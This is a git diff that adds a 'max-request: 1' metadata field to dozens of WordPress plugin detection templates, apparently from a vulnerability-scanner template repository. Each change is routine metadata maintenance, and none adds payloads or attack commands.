--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
